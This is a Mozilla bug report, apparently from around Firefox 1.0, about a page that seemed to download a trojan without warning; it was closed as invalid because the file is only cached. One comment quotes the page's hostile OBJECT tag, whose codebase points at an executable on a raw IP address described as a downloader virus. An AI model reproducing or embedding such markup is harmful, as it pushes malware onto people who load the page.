272222 - downloads virus without warning! Unsafe!

Status: VERIFIED INVALID

(Toolkit :: Downloads API, defect)

Description

[San Bergmans]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

While demonstrating the security of firefox, compared to IE, I found that
firefox also downloads the virus without warning from firefox. Fortunately the
virus scanner intercepted the file, otherwise the system would have been infected.

Virus scanner alert:
C:\DOCUME~1\LEOKON~1\LOCALS~1\TEMP\VBVIS3HK.EXE
The Trojan horse TR/Drop.Delf.DJ.3

Win2k was completely updated.

Reproducible: Always
Steps to Reproduce:
1.Simply enter URL
2.id value may have to be changed to repeat the effect
3.



Expected Results:  
at least warn me before downloading dangerous files like these.

Comment 1

[Asaf Romano (gone)]

*** This bug has been marked as a duplicate of 249951 ***

Comment 2

[OstGote!]

The frame contains something like this

<OBJECT CLASSID="CLSID:00000000-0000-0000-0000-000020040000"
codebase="http://207.234.185.217/ABoxInst_int21.exe" width="0" height="0"></object>

This file contains a virus (generic downloader).

But with Mozilla 1.8a6 build 2003112606 and Firefox 1.0 on WinNT4 I don't have
an auto-download of the file. So WFM.

Comment 3

[Matthias Versen [:Matti]]

not a dupe of that bug (which deals with .exe downloads)

Comment 4

[Matthias Versen [:Matti]]

"Fortunately the virus scanner intercepted the file, otherwise the system would
have been infected."

That is wrong. Mozilla possible predownloads the file but downlaoding a file in
the temp directory or the Mozilla cache directory but Mozilla doesn't execute it
and this file will be also deleted if you close Mozilla or Firefox.

-> invalid (no security risk)

Comment 5

[Mike Kowalski]

v